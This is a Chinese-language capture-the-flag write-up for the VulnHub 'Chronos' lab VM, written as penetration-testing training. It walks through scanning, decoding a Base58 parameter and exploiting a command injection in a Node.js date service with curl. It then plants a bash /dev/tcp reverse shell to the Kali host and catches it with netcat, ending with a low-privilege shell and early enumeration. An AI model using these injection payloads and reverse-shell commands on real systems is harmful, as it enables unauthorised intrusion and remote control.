靶机: Chronos
靶机: Chronos
准备
靶机:https://www.vulnhub.com/entry/chronos-1,735/
- 使用 VirtualBox
- 网络 Host-Only
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
完成上面内容后,需要对 kali 与 target 做 快照记录 当前环境和布置,以免实验过程中出现错误造成不可挽回的损失
打靶流程
发现目标
进行扫描,推荐工具:
- netdiscover
- arp-scan
- nmap
发现主机,我们可以使用 arp-scan 进行,主要使用参数
-l:从网络接口配置生成地址,使用网络接口IP地址和网络掩码
以生成目标主机地址的列表,该列表将包括网络和广播-I:指定网络接口
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
[sudo] kali 的密码:
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:30:29:a9 PCS Systemtechnik GmbH
192.168.56.113 08:00:27:b5:62:62 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.151 seconds (119.01 hosts/sec). 3 responded
确定存活主机后,通过 nmap 进一步扫描,我们可以确定目标靶机是 192.168.56.113 后,我们需要进一步确定其开放端口
┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.56.113
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-25 17:57 CST
Nmap scan report for 192.168.56.113
Host is up (0.0011s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.12 seconds
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
- 8000/tcp open http Node.js Express framework
尝试攻击
我们可以先尝试访问 http://192.168.56.113:80 端口,查看源码
<!DOCTYPE html>
<meta charset="UTF-8">
<html>
<head>
<link rel="stylesheet" href="css/style.css">
</head>
<body onload="loadDoc()">
<div id="wrapper">
<div class="future-cop">
<h3 class="future">Chronos - Date & Time</h3>
<h1 class="cop">
<p id="date"></p>
</h1>
</div>
</div>
<script>
var _0x5bdf=['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe','2SjTdWC','readyState','responseText','1278676qXleJg','797116soVTES','onreadystatechange','http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL','User-Agent','status','1DYOODT','400909Mbbcfr','Chronos','2QRBPWS','getElementById','innerHTML','date'];(function(_0x506b95,_0x817e36){var _0x244260=_0x432d;while(!![]){try{var _0x35824b=-parseInt(_0x244260(0x7e))*parseInt(_0x244260(0x90))+parseInt(_0x244260(0x8e))+parseInt(_0x244260(0x7f))*parseInt(_0x244260(0x83))+-parseInt(_0x244260(0x87))+-parseInt(_0x244260(0x82))*parseInt(_0x244260(0x8d))+-parseInt(_0x244260(0x88))+parseInt(_0x244260(0x80))*parseInt(_0x244260(0x84));if(_0x35824b===_0x817e36)break;else _0x506b95['push'](_0x506b95['shift']());}catch(_0x3fb1dc){_0x506b95['push'](_0x506b95['shift']());}}}(_0x5bdf,0xcaf1e));function _0x432d(_0x16bd66,_0x33ffa9){return _0x432d=function(_0x5bdf82,_0x432dc8){_0x5bdf82=_0x5bdf82-0x7e;var _0x4da6e8=_0x5bdf[_0x5bdf82];return _0x4da6e8;},_0x432d(_0x16bd66,_0x33ffa9);}function loadDoc(){var _0x17df92=_0x432d,_0x1cff55=_0x17df92(0x8f),_0x2beb35=new XMLHttpRequest();_0x2beb35[_0x17df92(0x89)]=function(){var _0x146f5d=_0x17df92;this[_0x146f5d(0x85)]==0x4&&this[_0x146f5d(0x8c)]==0xc8&&(document[_0x146f5d(0x91)](_0x146f5d(0x93))[_0x146f5d(0x92)]=this[_0x146f5d(0x86)]);},_0x2beb35[_0x17df92(0x81)]('GET',_0x17df92(0x8a),!![]),_0x2beb35['setRequestHeader'](_0x17df92(0x8b),_0x1cff55),_0x2beb35['send']();}
</script>
</body>
通过源码我们可以发现其中存在动态交互的代码
<body onload="loadDoc()">- Body onload 事件是在页面载入完成后立即触发 ,其语法是
onload="JavaScriptCode" - 说明页面加载完成后触发了 JavaScript 代码
loadDoc()
- Body onload 事件是在页面载入完成后立即触发 ,其语法是
根据上面线索,我们发现上面页面加载后触发 JavaScript 代码,而页面源码尾部存在的
<script>标签内容,明显是加密的 JavaScript 代码
var _0x5bdf = [
'150447srWefj',
'70lwLrol',
'1658165LmcNig',
'open',
'1260881JUqdKM',
'10737CrnEEe',
'2SjTdWC',
'readyState',
'responseText',
'1278676qXleJg',
'797116soVTES',
'onreadystatechange',
'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',
'User-Agent',
'status',
'1DYOODT',
'400909Mbbcfr',
'Chronos',
'2QRBPWS',
'getElementById',
'innerHTML',
'date'
];
(function (_0x506b95, _0x817e36) {
var _0x244260 = _0x432d;
while (!![]) {
try {
var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));
if (_0x35824b === _0x817e36)
break;
else
_0x506b95['push'](_0x506b95['shift']());
} catch (_0x3fb1dc) {
_0x506b95['push'](_0x506b95['shift']());
}
}
}(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) {
return _0x432d = function (_0x5bdf82, _0x432dc8) {
_0x5bdf82 = _0x5bdf82 - 126;
var _0x4da6e8 = _0x5bdf[_0x5bdf82];
return _0x4da6e8;
}, _0x432d(_0x16bd66, _0x33ffa9);
}
function loadDoc() {
var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();
_0x2beb35[_0x17df92(137)] = function () {
var _0x146f5d = _0x17df92;
this[_0x146f5d(133)] == 4 && this[_0x146f5d(140)] == 200 && (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);
}, _0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![]), _0x2beb35['setRequestHeader'](_0x17df92(139), _0x1cff55), _0x2beb35['send']();
}
- 其中的加密只是对变量及函数的名称修改,其数据本身没有变化
- 通过简单的阅读我们可以发现,它会向
http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL间存在交互 - 我们可以猜测
chronos.local域名可能对应的就是靶机
在浏览器的 Web 开发者工具 中的控制台,同样有报错
已拦截跨源请求:同源策略禁止读取位于 http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL 的远程资源。(原因:CORS 请求未能成功)。状态码:(null)。
- 报错是
http://192.168.56.113:80向http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL的远程资源请求 - 报错原因是
chronos.local无法解析
我们可以在本地 /etc/hosts 写入 IP 192.168.56.113 与域名 chronos.local 对应关系,再次访问 http://192.168.56.113:80 查看源码
<html><head><meta charset="UTF-8">
<link rel="stylesheet" href="css/style.css">
</head>
<body onload="loadDoc()">
<div id="wrapper">
<div class="future-cop">
<h3 class="future">Chronos - Date & Time</h3>
<h1 class="cop">
<p id="date">Today is Tuesday, October 25, 2022 11:39:07.
</p>
</h1>
</div>
</div>
<script>
var _0x5bdf=['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe','2SjTdWC','readyState','responseText','1278676qXleJg','797116soVTES','onreadystatechange','http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL','User-Agent','status','1DYOODT','400909Mbbcfr','Chronos','2QRBPWS','getElementById','innerHTML','date'];(function(_0x506b95,_0x817e36){var _0x244260=_0x432d;while(!![]){try{var _0x35824b=-parseInt(_0x244260(0x7e))*parseInt(_0x244260(0x90))+parseInt(_0x244260(0x8e))+parseInt(_0x244260(0x7f))*parseInt(_0x244260(0x83))+-parseInt(_0x244260(0x87))+-parseInt(_0x244260(0x82))*parseInt(_0x244260(0x8d))+-parseInt(_0x244260(0x88))+parseInt(_0x244260(0x80))*parseInt(_0x244260(0x84));if(_0x35824b===_0x817e36)break;else _0x506b95['push'](_0x506b95['shift']());}catch(_0x3fb1dc){_0x506b95['push'](_0x506b95['shift']());}}}(_0x5bdf,0xcaf1e));function _0x432d(_0x16bd66,_0x33ffa9){return _0x432d=function(_0x5bdf82,_0x432dc8){_0x5bdf82=_0x5bdf82-0x7e;var _0x4da6e8=_0x5bdf[_0x5bdf82];return _0x4da6e8;},_0x432d(_0x16bd66,_0x33ffa9);}function loadDoc(){var _0x17df92=_0x432d,_0x1cff55=_0x17df92(0x8f),_0x2beb35=new XMLHttpRequest();_0x2beb35[_0x17df92(0x89)]=function(){var _0x146f5d=_0x17df92;this[_0x146f5d(0x85)]==0x4&&this[_0x146f5d(0x8c)]==0xc8&&(document[_0x146f5d(0x91)](_0x146f5d(0x93))[_0x146f5d(0x92)]=this[_0x146f5d(0x86)]);},_0x2beb35[_0x17df92(0x81)]('GET',_0x17df92(0x8a),!![]),_0x2beb35['setRequestHeader'](_0x17df92(0x8b),_0x1cff55),_0x2beb35['send']();}
</script>
</body></html>
- 发现
<p id="date"></p>标签增加了一些文本内容Today is Tuesday, October 25, 2022 11:39:07. - 并且文本内容中的时间是动态的,而 js 的动态代码需要访问
http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL的远程资源才能实现
我们需要了解整个通信过程中发生了什么,建议通过浏览器的 Web 开发者工具进行网络拦截,下面两条对 http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL 的请求及响应
OPTIONS
OPTIONS /date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL HTTP/1.1
Host: chronos.local:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Access-Control-Request-Method: GET
Access-Control-Request-Headers: user-agent
Referer: http://192.168.56.113/
Origin: http://192.168.56.113
Connection: keep-alive HTTP/1.1 204 No Content
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
Vary: Access-Control-Request-Headers
Access-Control-Allow-Headers: user-agent
Content-Length: 0
Date: Tue, 25 Oct 2022 11:49:54 GMT
Connection: keep-alive
Keep-Alive: timeout=5
GET
GET /date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL HTTP/1.1
Host: chronos.local:8000
User-Agent: Chronos
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://192.168.56.113
Connection: keep-alive
Referer: http://192.168.56.113/
If-None-Match: W/"2d-PsZR2bm/Ri6PVcgGA5J3M+spbnU" HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 45
ETag: W/"2d-e8tKXQN2562kykTMB0KQtpk5bMI"
Date: Tue, 25 Oct 2022 11:49:54 GMT
Connection: keep-alive
Keep-Alive: timeout=5 Today is Tuesday, October 25, 2022 11:49:54.
通过上面两个请求,我们已经可以明确,时间的动态实现是通过服务端计算完成的,那么 GET 请求的数据又是什么 GET /date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL HTTP/1.1
- format 是格式化修改的命名,当然我们应该先解密一下请求内容
4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL推荐一个线上解密网站:https://gchq.github.io/CyberChef/ - 大致推断是 Base58 加密,结果为
'+Today is %A, %B %d, %Y %H:%M:%S.' - 说明动态请求是时间格式
我们尝试一下通过,语句拼接注入是否与 shell 相关,使用 curl 发送 GET 请求的注入命令 || ls
# 先使用 Base58 加密注入命令 || ls 结果为 yZSGA
curl \
-H "User-Agent: Chronos" \
-H "Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" \
-H "Origin: http://192.168.56.113" \
-H "Connection: keep-alive" \
-H "Referer: http://192.168.56.113/" \
--include "http://chronos.local:8000/date?format=yZSGA"
- 参数
-H指定的是之前我们使用浏览器 Web 开发者工具获取的 GET 请求头;此处参数应该根据你自己捕捉的 GET 请求头中的内容,当然不用全部选项 - 参数
--include查看响应头
使用效果如下
┌──(kali㉿kali)-[~]
└─$ curl \
-H "User-Agent: Chronos" \
-H "Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" \
-H "Origin: http://192.168.56.113" \
-H "Connection: keep-alive" \
-H "Referer: http://192.168.56.113/" \
--include "http://chronos.local:8000/date?format=yZSGA"
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 80
ETag: W/"50-Xyj2XbGXPX1jv8HLpPgUE3VeS9I"
Date: Tue, 25 Oct 2022 13:52:15 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Tue Oct 25 13:52:15 UTC 2022
app.js
node_modules
package.json
package-lock.json
┌──(kali㉿kali)-[~]
└─$
其中的响应体内容很值得我们注意
Tue Oct 25 13:52:15 UTC 2022
app.js
node_modules
package.json
package-lock.json
说明此处雀实存在注入漏洞,并且可执行
我们可以尝试,查找 wget , netcat , bash 等命令是否存在能有有执行权,我们都能通过它们实现 shell 反弹
诺曼底登陆
上面内容已经查明,存在注入漏洞,探测 /bin 有什么用于远程交互的程序
┌──(kali㉿kali)-[~]
└─$ curl \
-H "User-Agent: Chronos" \
-H "Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" \
-H "Origin: http://192.168.56.113" \
-H "Connection: keep-alive" \
-H "Referer: http://192.168.56.113/" \
--include "http://chronos.local:8000/date?format=F2SaSe3T3SZy3G4RcHK"
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 8698
ETag: W/"21fa-XtkiURgIt2CBvycigXakpI4x1dA"
Date: Tue, 25 Oct 2022 14:07:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Tue Oct 25 14:07:39 UTC 2022
total 15M
-rwxr-xr-x 1 root root 1.1M Jun 6 2019 bash
-rwxr-xr-x 1 root root 700K Mar 12 2018 btrfs
lrwxrwxrwx 1 root root 5 Mar 12 2018 btrfsck -> btrfs
-rwxr-xr-x 1 root root 368K Mar 12 2018 btrfs-debug-tree
-rwxr-xr-x 1 root root 364K Mar 12 2018 btrfs-find-root
-rwxr-xr-x 1 root root 388K Mar 12 2018 btrfs-image
-rwxr-xr-x 1 root root 368K Mar 12 2018 btrfs-map-logical
-rwxr-xr-x 1 root root 364K Mar 12 2018 btrfs-select-super
-rwxr-xr-x 1 root root 368K Mar 12 2018 btrfstune
-rwxr-xr-x 1 root root 364K Mar 12 2018 btrfs-zero-log
-rwxr-xr-x 3 root root 35K Jul 4 2019 bunzip2
-rwxr-xr-x 1 root root 2.0M Sep 18 2020 busybox
-rwxr-xr-x 3 root root 35K Jul 4 2019 bzcat
lrwxrwxrwx 1 root root 6 Jul 4 2019 bzcmp -> bzdiff
-rwxr-xr-x 1 root root 2.1K Jul 4 2019 bzdiff
lrwxrwxrwx 1 root root 6 Jul 4 2019 bzegrep -> bzgrep
-rwxr-xr-x 1 root root 4.8K Jul 4 2019 bzexe
lrwxrwxrwx 1 root root 6 Jul 4 2019 bzfgrep -> bzgrep
-rwxr-xr-x 1 root root 3.6K Jul 4 2019 bzgrep
-rwxr-xr-x 3 root root 35K Jul 4 2019 bzip2
-rwxr-xr-x 1 root root 14K Jul 4 2019 bzip2recover
lrwxrwxrwx 1 root root 6 Jul 4 2019 bzless -> bzmore
-rwxr-xr-x 1 root root 1.3K Jul 4 2019 bzmore
-rwxr-xr-x 1 root root 35K Jan 18 2018 cat
-rwxr-xr-x 1 root root 14K Apr 21 2017 chacl
-rwxr-xr-x 1 root root 63K Jan 18 2018 chgrp
-rwxr-xr-x 1 root root 59K Jan 18 2018 chmod
-rwxr-xr-x 1 root root 67K Jan 18 2018 chown
-rwxr-xr-x 1 root root 11K Jan 22 2018 chvt
-rwxr-xr-x 1 root root 139K Jan 18 2018 cp
-rwxr-xr-x 1 root root 154K Nov 5 2019 cpio
-rwxr-xr-x 1 root root 119K Jan 25 2018 dash
-rwxr-xr-x 1 root root 99K Jan 18 2018 date
-rwxr-xr-x 1 root root 75K Jan 18 2018 dd
-rwxr-xr-x 1 root root 83K Jan 18 2018 df
-rwxr-xr-x 1 root root 131K Jan 18 2018 dir
-rwxr-xr-x 1 root root 71K Sep 16 2020 dmesg
lrwxrwxrwx 1 root root 8 Jan 31 2018 dnsdomainname -> hostname
lrwxrwxrwx 1 root root 8 Jan 31 2018 domainname -> hostname
-rwxr-xr-x 1 root root 167K Jan 22 2018 dumpkeys
-rwxr-xr-x 1 root root 35K Jan 18 2018 echo
-rwxr-xr-x 1 root root 51K Apr 26 2016 ed
-rwxr-xr-x 1 root root 28 Sep 18 2019 egrep
-rwxr-xr-x 1 root root 31K Jan 18 2018 false
-rwxr-xr-x 1 root root 11K Jan 22 2018 fgconsole
-rwxr-xr-x 1 root root 28 Sep 18 2019 fgrep
-rwxr-xr-x 1 root root 64K Sep 16 2020 findmnt
-rwxr-xr-x 1 root root 1.2K Mar 12 2018 fsck.btrfs
-rwxr-xr-x 1 root root 36K Dec 11 2018 fuser
-rwsr-xr-x 1 root root 31K Aug 11 2016 fusermount
-rwxr-xr-x 1 root root 23K Apr 21 2017 getfacl
-rwxr-xr-x 1 root root 215K Sep 18 2019 grep
-rwxr-xr-x 2 root root 2.3K Jun 24 2021 gunzip
-rwxr-xr-x 1 root root 5.8K Jun 24 2021 gzexe
-rwxr-xr-x 1 root root 100K Jun 24 2021 gzip
-rwxr-xr-x 1 root root 19K Jan 31 2018 hostname
-rwxr-xr-x 1 root root 546K Jan 26 2021 ip
-rwxr-xr-x 1 root root 63K Jul 21 2021 journalctl
-rwxr-xr-x 1 root root 11K Jan 22 2018 kbd_mode
-rwxr-xr-x 1 root root 27K Aug 9 2019 kill
-rwxr-xr-x 1 root root 147K Jul 28 2020 kmod
-rwxr-xr-x 1 root root 167K Dec 1 2017 less
-rwxr-xr-x 1 root root 11K Dec 1 2017 lessecho
lrwxrwxrwx 1 root root 8 Dec 1 2017 lessfile -> lesspipe
-rwxr-xr-x 1 root root 20K Dec 1 2017 lesskey
-rwxr-xr-x 1 root root 8.4K Dec 1 2017 lesspipe
-rwxr-xr-x 1 root root 67K Jan 18 2018 ln
-rwxr-xr-x 1 root root 207K Jan 22 2018 loadkeys
-rwxr-xr-x 1 root root 52K Mar 22 2019 login
-rwxr-xr-x 1 root root 51K Jul 21 2021 loginctl
-rwxr-xr-x 1 root root 107K Mar 21 2019 lowntfs-3g
-rwxr-xr-x 1 root root 131K Jan 18 2018 ls
-rwxr-xr-x 1 root root 83K Sep 16 2020 lsblk
lrwxrwxrwx 1 root root 4 Jul 28 2020 lsmod -> kmod
-rwxr-xr-x 1 root root 79K Jan 18 2018 mkdir
-rwxr-xr-x 1 root root 388K Mar 12 2018 mkfs.btrfs
-rwxr-xr-x 1 root root 67K Jan 18 2018 mknod
-rwxr-xr-x 1 root root 43K Jan 18 2018 mktemp
-rwxr-xr-x 1 root root 39K Sep 16 2020 more
-rwsr-xr-x 1 root root 43K Sep 16 2020 mount
-rwxr-xr-x 1 root root 15K Sep 16 2020 mountpoint
lrwxrwxrwx 1 root root 20 Jul 25 2018 mt -> /etc/alternatives/mt
-rwxr-xr-x 1 root root 79K Nov 5 2019 mt-gnu
-rwxr-xr-x 1 root root 135K Jan 18 2018 mv
-rwxr-xr-x 1 root root 241K Mar 6 2018 nano
lrwxrwxrwx 1 root root 20 Jul 25 2018 nc -> /etc/alternatives/nc
-rwxr-xr-x 1 root root 35K May 14 2018 nc.openbsd
lrwxrwxrwx 1 root root 24 Jul 25 2018 netcat -> /etc/alternatives/netcat
-rwxr-xr-x 1 root root 151K Jan 10 2017 netstat
-rwxr-xr-x 1 root root 43K Jul 21 2021 networkctl
lrwxrwxrwx 1 root root 8 Jan 31 2018 nisdomainname -> hostname
-rwxr-xr-x 1 root root 143K Mar 21 2019 ntfs-3g
-rwxr-xr-x 1 root root 11K Mar 21 2019 ntfs-3g.probe
-rwxr-xr-x 1 root root 27K Mar 21 2019 ntfscat
-rwxr-xr-x 1 root root 35K Mar 21 2019 ntfscluster
-rwxr-xr-x 1 root root 35K Mar 21 2019 ntfscmp
-rwxr-xr-x 1 root root 35K Mar 21 2019 ntfsfallocate
-rwxr-xr-x 1 root root 43K Mar 21 2019 ntfsfix
-rwxr-xr-x 1 root root 55K Mar 21 2019 ntfsinfo
-rwxr-xr-x 1 root root 32K Mar 21 2019 ntfsls
-rwxr-xr-x 1 root root 31K Mar 21 2019 ntfsmove
-rwxr-xr-x 1 root root 115K Mar 21 2019 ntfsrecover
-rwxr-xr-x 1 root root 87K Mar 21 2019 ntfssecaudit
-rwxr-xr-x 1 root root 39K Mar 21 2019 ntfstruncate
-rwxr-xr-x 1 root root 31K Mar 21 2019 ntfsusermap
-rwxr-xr-x 1 root root 47K Mar 21 2019 ntfswipe
lrwxrwxrwx 1 root root 6 Jan 22 2018 open -> openvt
-rwxr-xr-x 1 root root 19K Jan 22 2018 openvt
lrwxrwxrwx 1 root root 14 Nov 1 2017 pidof -> /sbin/killall5
-rwsr-xr-x 1 root root 63K Jun 28 2019 ping
lrwxrwxrwx 1 root root 4 Jun 28 2019 ping4 -> ping
lrwxrwxrwx 1 root root 4 Jun 28 2019 ping6 -> ping
-rwxr-xr-x 1 root root 38K Apr 4 2019 plymouth
-rwxr-xr-x 1 root root 131K Aug 9 2019 ps
-rwxr-xr-x 1 root root 35K Jan 18 2018 pwd
lrwxrwxrwx 1 root root 4 Jun 6 2019 rbash -> bash
-rwxr-xr-x 1 root root 43K Jan 18 2018 readlink
-rwxr-xr-x 1 root root 89 Apr 26 2016 red
-rwxr-xr-x 1 root root 63K Jan 18 2018 rm
-rwxr-xr-x 1 root root 43K Jan 18 2018 rmdir
lrwxrwxrwx 1 root root 4 Mar 6 2018 rnano -> nano
-rwxr-xr-x 1 root root 19K Dec 30 2017 run-parts
-rwxr-xr-x 1 root root 107K Jan 30 2018 sed
-rwxr-xr-x 1 root root 35K Apr 21 2017 setfacl
-rwxr-xr-x 1 root root 43K Jan 22 2018 setfont
-rwxr-xr-x 1 root root 39K Apr 23 2019 setupcon
lrwxrwxrwx 1 root root 4 Jul 25 2018 sh -> dash
lrwxrwxrwx 1 root root 4 Jan 25 2018 sh.distrib -> dash
-rwxr-xr-x 1 root root 35K Jan 18 2018 sleep
-rwxr-xr-x 1 root root 137K Jan 26 2021 ss
lrwxrwxrwx 1 root root 7 Sep 18 2020 static-sh -> busybox
-rwxr-xr-x 1 root root 75K Jan 18 2018 stty
-rwsr-xr-x 1 root root 44K Mar 22 2019 su
-rwxr-xr-x 1 root root 35K Jan 18 2018 sync
-rwxr-xr-x 1 root root 179K Jul 21 2021 systemctl
lrwxrwxrwx 1 root root 20 Jul 21 2021 systemd -> /lib/systemd/systemd
-rwxr-xr-x 1 root root 11K Jul 21 2021 systemd-ask-password
-rwxr-xr-x 1 root root 15K Jul 21 2021 systemd-escape
-rwxr-xr-x 1 root root 83K Jul 21 2021 systemd-hwdb
-rwxr-xr-x 1 root root 15K Jul 21 2021 systemd-inhibit
-rwxr-xr-x 1 root root 19K Jul 21 2021 systemd-machine-id-setup
-rwxr-xr-x 1 root root 15K Jul 21 2021 systemd-notify
-rwxr-xr-x 1 root root 43K Jul 21 2021 systemd-sysusers
-rwxr-xr-x 1 root root 71K Jul 21 2021 systemd-tmpfiles
-rwxr-xr-x 1 root root 27K Jul 21 2021 systemd-tty-ask-password-agent
-rwxr-xr-x 1 root root 414K Dec 16 2020 tar
-rwxr-xr-x 1 root root 9.9K Dec 30 2017 tempfile
-rwxr-xr-x 1 root root 87K Jan 18 2018 touch
-rwxr-xr-x 1 root root 31K Jan 18 2018 true
-rwxr-xr-x 1 root root 571K Jul 21 2021 udevadm
-rwxr-xr-x 1 root root 14K Aug 11 2016 ulockmgr_server
-rwsr-xr-x 1 root root 27K Sep 16 2020 umount
-rwxr-xr-x 1 root root 35K Jan 18 2018 uname
-rwxr-xr-x 2 root root 2.3K Jun 24 2021 uncompress
-rwxr-xr-x 1 root root 2.7K Jan 22 2018 unicode_start
-rwxr-xr-x 1 root root 131K Jan 18 2018 vdir
-rwxr-xr-x 1 root root 31K Sep 16 2020 wdctl
-rwxr-xr-x 1 root root 946 Dec 30 2017 which
-rwxr-xr-x 1 root root 27K Jan 12 2018 whiptail
lrwxrwxrwx 1 root root 8 Jan 31 2018 ypdomainname -> hostname
-rwxr-xr-x 1 root root 1.9K Jun 24 2021 zcat
-rwxr-xr-x 1 root root 1.8K Jun 24 2021 zcmp
-rwxr-xr-x 1 root root 5.7K Jun 24 2021 zdiff
-rwxr-xr-x 1 root root 140 Jun 24 2021 zegrep
-rwxr-xr-x 1 root root 140 Jun 24 2021 zfgrep
-rwxr-xr-x 1 root root 2.1K Jun 24 2021 zforce
-rwxr-xr-x 1 root root 5.8K Jun 24 2021 zgrep
-rwxr-xr-x 1 root root 2.0K Jun 24 2021 zless
-rwxr-xr-x 1 root root 1.9K Jun 24 2021 zmore
-rwxr-xr-x 1 root root 5.0K Jun 24 2021 znew
- 明显可以反弹
bash - 利用
netcat完成
建立连接分三步
建一个 a.sh 文件
&& touch a.sh-->4BJ88cmrr8TWSEti5Mcurl \
-H "User-Agent: Chronos" \
-H "Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" \
-H "Origin: http://192.168.56.113" \
-H "Connection: keep-alive" \
-H "Referer: http://192.168.56.113/" \
--include "http://chronos.local:8000/date?format=4BJ88cmrr8TWSEti5M"
将反弹 shell 命令
bash -i >& /dev/tcp/Kali IP/监听端口 0>&1发送&& echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > ./a.sh-->B2K4FCAU1SDpFs1S5Lz6BZeyhpypkmQyyYfeZ3717VL7rKXQ59JFUhUZoEALMGnrfQBXSG3afUySYp9wmysnWscurl \
-H "User-Agent: Chronos" \
-H "Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" \
-H "Origin: http://192.168.56.113" \
-H "Connection: keep-alive" \
-H "Referer: http://192.168.56.113/" \
--include "http://chronos.local:8000/date?format=B2K4FCAU1SDpFs1S5Lz6BZeyhpypkmQyyYfeZ3717VL7rKXQ59JFUhUZoEALMGnrfQBXSG3afUySYp9wmysnWs"
在 Kali 上设置端口监听,使用
netcat设置netcat -lvp 4444端口以上一步你反弹 shell 的木马为准,然后调用a.sh脚本使用命令&& bash ./a.sh-->F2SaQ9Dykw37PPsvZhqcurl \
-H "User-Agent: Chronos" \
-H "Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" \
-H "Origin: http://192.168.56.113" \
-H "Connection: keep-alive" \
-H "Referer: http://192.168.56.113/" \
--include "http://chronos.local:8000/date?format=F2SaQ9Dykw37PPsvZhq"
最终效果
┌──(kali㉿kali)-[~]
└─$ netcat -lvp 4444 1 ⨯
listening on [any] 4444 ...
connect to [192.168.56.111] from chronos.local [192.168.56.113] 53012
bash: cannot set terminal process group (734): Inappropriate ioctl for device
bash: no job control in this shell
www-data@chronos:/opt/chronos$ ls
ls
app.js
a.sh
node_modules
package.json
package-lock.json
- 使用 ls 查看,我们已经成功登录目标
探索目标
开始简单的信息收集
www-data@chronos:/home/imera$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@chronos:/home/imera$ uname -a
uname -a
Linux chronos 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
- 用户权限是非常低的
- 系统内核版本 4.15.0-151-generic 也不是能很好利用内核漏洞
我们可以确定一下当前系统中有几个用户
www-data@chronos:/opt/chronos$ cd /home
cd /home
www-data@chronos:/home$ ls
ls
imera
